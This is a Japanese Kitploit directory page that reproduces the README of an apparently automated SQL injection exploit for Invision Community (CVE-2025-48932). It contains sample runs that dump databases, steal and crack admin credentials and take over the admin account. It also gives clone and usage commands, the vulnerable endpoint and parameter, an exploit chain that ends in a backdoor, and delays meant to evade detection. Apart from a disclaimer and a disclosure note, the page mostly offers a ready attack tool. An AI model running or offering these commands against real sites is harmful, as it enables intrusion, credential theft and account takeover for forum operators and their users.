Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2025-48932-Invision-Community-SQLi-Exploit — CVE-2025-48932 - Unauthenticated SQL injection exploit for Invision Community ≤ 4.7.20. Fully automated exploitation with database enumeration, credential dumping, admin takeover, session hijacking & multi-threading. No dependencies required. Security research tool by Sudeepa Wanigarathna | Kitploit
ツール/GitHubGitHub/cerberusmrxi/cve-2025-48932-invision-community-sqli-exploit
Password AttacksVulnerability AnalysisExploitationWeb Application ExploitationData ExfiltrationInformation GatheringPost-ExploitationWeb SecurityPenetration Testing

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →

概要

CVE-2025-48932 - Unauthenticated SQL injection exploit for Invision Community ≤ 4.7.20. Fully automated exploitation with database enumeration, credential dumping, admin takeover, session hijacking & multi-threading. No dependencies required. Security research tool by Sudeepa Wanigarathna

GitHubcerberusmrxi/cve-2025-48932-invision-community-sqli-exploit

CVE-2025-48932-Invision-Community-SQLi-Exploit

リポジトリを見る
118日前未レビュー
共有

🔓 CVE-2025-48932 - Invision Community SQLインジェクションエクスプロイト

Python Version License Security Status CVE Exploit-DB PRs Welcome Maintenance Hits


⚡ 重大な脆弱性の概要

CVE-2025-48932 は、Invision Community バージョン ≤ 4.7.20 で発見された認証を必要としない重大なブラインドSQLインジェクション脆弱性です。このエクスプロイトにより、リモートの攻撃者は以下を実行できます:

  • 🔍 機密データベース情報の抽出
  • 👤 ユーザー認証情報とパスワードハッシュの窃取
  • 🔑 管理者アカウントの乗っ取り
  • 🎯 アクティブなユーザーセッションのハイジャック
  • 💻 管理者乗っ取りによるリモートコード実行(RCE)の達成
  • 📊 データベース全体の内容のダンプ

🎯 機能


📊 デモとスクリーンショット

エクスプロイトの実行

root@kitploit:~
$ python3 exploit.py -u https://vulnerable-site.com -v

╔══════════════════════════════════════════════════════════════════╗
║  CVE-2025-48932 - Invision Community SQL Injection               ║
║  Author: Sudeepa Wanigarathna                                    ║
║  Critical: Unauthenticated Remote Code Execution                 ║
╚══════════════════════════════════════════════════════════════════╝

[*] Target: https://vulnerable-site.com
[*] Performing vulnerability assessment...
[+] Target is confirmed VULNERABLE!

[*] Enumerating database information...
[+] Database Information:
  Version: 10.4.32-MariaDB
  User: invision@localhost
  Database: invision_community
  Hostname: localhost
  Basedir: /usr/
  Datadir: /var/lib/mysql/

[*] Enumerating databases...
[+] Found 5 databases
  Found: information_schema
  Found: invision_community
  Found: mysql
  Found: performance_schema
  Found: phpmyadmin

[*] Enumerating tables in invision_community...
[+] Found 12 tables
  Found: core_members
  Found: core_sessions
  Found: admin_members
  Found: cms_categories
  Found: forums_posts
  ...

[*] Searching for credentials...
[+] Found credential table: core_members
  Credentials: admin - $2y$10$abcdefghijklmnopqrstuvwxyz...
  Credentials: moderator - $2y$10$1234567890abcdefghijklmnop...
  Credentials: user123 - $2y$10$qwertyuiopasdfghjklzxcvbnm...

[*] Extracting admin information...
[+] Admin Information Found:
  name: admin
  email: [email protected]
  id: 1
  password_hash: $2y$10$abcdefghijklmnopqrstuvwxyz...

[*] Attempting to crack password hash...
[+] Detected hash type: bcrypt
[+] Password cracked: Admin@2024!

[*] Attempting admin bypass...
[+] Admin login successful!
[+] Credentials: admin:Admin@2024!

[+] Exploitation complete!
[+] Report saved to invision_exploit_report_1700000000.json

JSON出力のサンプル

root@kitploit:~
{
  "target": "https://vulnerable-site.com",
  "timestamp": "2026-08-02T12:34:56.789Z",
  "vulnerable": true,
  "database": {
    "version": "10.4.32-MariaDB",
    "user": "invision@localhost",
    "database": "invision_community",
    "hostname": "localhost"
  },
  "databases": [
    "information_schema",
    "invision_community",
    "mysql",
    "performance_schema",
    "phpmyadmin"
  ],
  "tables": [
    "core_members",
    "core_sessions",
    "admin_members"
  ],
  "credentials": [
    {
      "username": "admin",
      "password_hash": "$2y$10$abcdefghijklmnopqrstuvwxyz...",
      "email": "[email protected]"
    }
  ],
  "admin_info": {
    "name": "admin",
    "email": "[email protected]",
    "id": "1",
    "password_hash": "$2y$10$abcdefghijklmnopqrstuvwxyz..."
  },
  "summary": {
    "total_databases": 5,
    "total_tables": 12,
    "total_credentials": 3,
    "vulnerable": true,
    "successful": true
  }
}

🚀 クイックスタートガイド

インストール

root@kitploit:~
# リポジトリをクローン
git clone https://github.com/CerberusMrXi/CVE-2025-48932-Invision-Community-SQLi-Exploit.git
cd CVE-2025-48932-Invision-Community-SQLi-Exploit

# インストールする依存関係はありません!実行するだけです。

基本的な使い方

root@kitploit:~
# ターゲットが脆弱かどうかを確認
python3 exploit.py -u https://example.com --check-only

# 冗長出力による完全なエクスプロイト
python3 exploit.py -u https://example.com -v

# プロキシ使用(Burp Suite)
python3 exploit.py -u https://example.com -p http://127.0.0.1:8080 -v

# 結果をカスタムファイルに保存
python3 exploit.py -u https://example.com -o results.json

# マルチスレッド抽出(より高速)
python3 exploit.py -u https://example.com -t 10

# 利用可能なすべてのデータをダンプ
python3 exploit.py -u https://example.com --dump-all

高度な使い方

root@kitploit:~
# パスワードクラッキング用のカスタムワードリストを使用
python3 exploit.py -u https://example.com --wordlist rockyou.txt -v

# サイレントモード(出力なし、レポートのみ)
python3 exploit.py -u https://example.com -o silent_report.json

# 詳細なエラーを表示するデバッグモード
python3 exploit.py -u https://example.com -v --debug

📋 要件

システム要件

  • Python: 3.6以上
  • OS: Linux、Windows、macOS(Pythonが動作するあらゆるOS)
  • メモリ: 最小限(約50MB RAM)
  • ストレージ: 約100KB(エクスプロイトのみ)

依存関係

root@kitploit:~
✅ 外部依存関係なし!
✅ Pure Python標準ライブラリのみ!
✅ pip installや仮想環境は不要!

オプション(パスワードクラッキング用)

  • ワードリスト: rockyou.txt または任意のカスタムワードリスト
    root@kitploit:~
    # 人気のワードリストをダウンロード
    wget https://github.com/brannondorsey/naive-hashcat/releases/download/data/rockyou.txt
    

🛠️ 技術的詳細

脆弱性の場所

  • ファイル: /applications/calendar/modules/front/calendar/view.php
  • メソッド: IPS\calendar\modules\front\calendar\view::search()
  • パラメータ: location(ユーザー指定の入力)
  • タイプ: ブールベースのブラインドSQLインジェクション

攻撃ベクター

root@kitploit:~
GET /applications/calendar/modules/front/calendar/view.php?do=search&location=[SQL_INJECTION_PAYLOAD]

エクスプロイトチェーン

  1. 検出: ブールベースインジェクションの検出
  2. 列挙: データベース構造の抽出
  3. 抽出: 機密データのダンプ
  4. 認証情報の窃取: ユーザー認証情報の抽出
  5. 権限昇格: 管理者アカウントの乗っ取り
  6. セッションハイジャック: アクティブなセッションの窃取
  7. 永続化: バックドアの設置(オプション)

対応データベースバージョン

  • MySQL 5.0+
  • MariaDB 5.5+
  • Percona Server

🔒 セキュリティと法的通知

⚠️ 重要免責事項

このツールは教育目的および許可されたテスト目的専用です。

このツールを使用することにより、以下に同意したものとみなされます:

  • 所有している、または明示的なテスト許可を得たシステムでのみ使用する
  • 違法または悪意のある目的で使用しない
  • 適用されるすべての法律と規制を遵守する
  • 自身の行動に対する全責任を負う

コンピュータシステムへの不正アクセスは違法かつ非倫理的です。

責任ある開示

  • ベンダー: Invision Community
  • 開示日: 2025年5月16日
  • パッチ適用: バージョン 4.7.21(2025年5月27日)
  • CVE: CVE-2025-48932 割り当て済み

📚 ドキュメント

エクスプロイト引数

レポート構造

root@kitploit:~
invision_exploit_report_[timestamp].json
├── target                 # 対象URL
├── timestamp              # エクスプロイト実行日時
├── vulnerable             # 脆弱性ステータス
├── database               # データベース情報
├── databases              # データベース一覧
├── tables                 # テーブル一覧
├── credentials            # 抽出された認証情報
├── admin_info             # 管理者ユーザー情報
└── summary                # エクスプロイト概要

🎯 ユースケース

セキュリティ研究者向け

  • ✅ 脆弱性の検証
  • ✅ 概念実証(PoC)の開発
  • ✅ セキュリティ評価
  • ✅ バグバウンティハンティング

ペネトレーションテスター向け

  • ✅ 外部/内部ペネトレーションテスト
  • ✅ レッドチーム運用
  • ✅ 脆弱性の確認
  • ✅ コンプライアンステスト

システム管理者向け

  • ✅ 自社システムのセキュリティ監査
  • ✅ パッチの検証
  • ✅ インシデントレスポンス調査
  • ✅ セキュリティ態勢の評価

🐛 トラブルシューティング

一般的な問題と解決策

問題: 接続タイムアウト

root@kitploit:~
# 解決策: タイムアウトを延長するか、ネットワークを確認してください
python3 exploit.py -u https://example.com --timeout 60

問題: SSL証明書エラー

root@kitploit:~
# 解決策: SSL検証を無効化(本番環境では推奨されません)
python3 exploit.py -u https://example.com --no-verify-ssl

問題: レート制限が検出された

root@kitploit:~
# 解決策: スレッド数を減らし、遅延を増やす
python3 exploit.py -u https://example.com -t 2 --delay 2

問題: 脆弱なパラメータが見つからない

root@kitploit:~
# 解決策: カレンダーアプリがインストールされ、GeoLocationが有効であることを確認
# 確認: /applications/calendar/modules/front/calendar/view.php が存在する

📖 参考文献

公式リソース

  • CVE-2025-48932
  • Invision Community
  • Invision セキュリティ速報
  • 元のアドバイザリ

技術リファレンス

  • OWASP SQL Injection
  • Blind SQL Injection
  • MySQL Documentation

関連CVE

  • CVE-2024-xxxxx(以前のInvisionの脆弱性)
  • CVE-2023-xxxxx(関連するコミュニティプラットフォームのCVE)

🤝 貢献

貢献を歓迎します!貢献ガイドラインをご覧ください。

貢献方法

  1. リポジトリをフォークする
  2. フィーチャーブランチを作成する(git checkout -b feature/AmazingFeature)
  3. 変更をコミットする(git commit -m 'Add some AmazingFeature')
  4. ブランチにプッシュする(git push origin feature/AmazingFeature)
  5. プルリクエストを開く

問題の報告

  • 🐛 バグ報告
  • 💡 機能リクエスト
  • 🔒 セキュリティ問題

👨‍💻 作成者

Sudeepa Wanigarathna

セキュリティ研究者&バグバウンティハンター

  • 🌐 GitHub
  • 🐦 Twitter
  • 💼 LinkedIn
  • 📧 Email

📄 ライセンス

このプロジェクトはMITライセンスの下でライセンスされています。詳細はLICENSEファイルを参照してください。

root@kitploit:~
MIT License

Copyright (c) 2026 Sudeepa Wanigarathna

Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:

The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.

THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.

⭐ サポートの表明

このプロジェクトが役に立った場合、または興味を持った場合:

  • ⭐ このリポジトリにスターを付ける
  • 🔗 あなたのネットワークで共有する
  • 📢 セキュリティ研究で言及する
  • 🤝 改善のために貢献する

🙏 謝辞

Sudeepa Wanigarathna

サイバーセキュリティ研究者 | ソフトウェアエンジニア | CTFエンジニア

このプロジェクトは、セキュリティ研究、防御的分析、および許可されたペネトレーションテストのために提供されています。ユーザーは、適用されるすべての法律を遵守し、使用前に適切な許可を取得する責任があります。

ツールをダウンロード
機能説明ステータス
🚀 依存関係ゼロPure Python標準ライブラリのみ - pip install不要✅
⚡ マルチスレッド設定可能なスレッド数による超高速データ抽出✅
🤖 完全自動化検出からレポート作成までの完全なエクスプロイトチェーン✅
👑 管理者乗っ取りセッションハイジャックと権限昇格✅
🔑 認証情報ダンプユーザー、パスワードハッシュ、メールアドレスの抽出✅
🔓 パスワードクラッキングワードリスト対応の組み込みハッシュクラッキング✅
📋 JSONレポート分析とドキュメント作成のための構造化出力✅
🔌 プロキシサポートBurp Suiteとカスタムプロキシの統合✅
🎨 カラー出力進捗インジケータ付きの見やすいターミナル出力✅
🛡️ レート制限検知を回避するための組み込み遅延✅
引数説明例
-u, --url対象URL(必須)-u https://example.com
-p, --proxyプロキシURL-p http://127.0.0.1:8080
-t, --threadsスレッド数(デフォルト: 5)-t 10
-o, --output結果の出力ファイル-o results.json
-v, --verbose冗長出力を有効にする-v
--check-only脆弱性の確認のみ行う--check-only
--dump-all利用可能なすべてのデータをダンプ--dump-all
--wordlistクラッキング用のワードリストファイル--wordlist rockyou.txt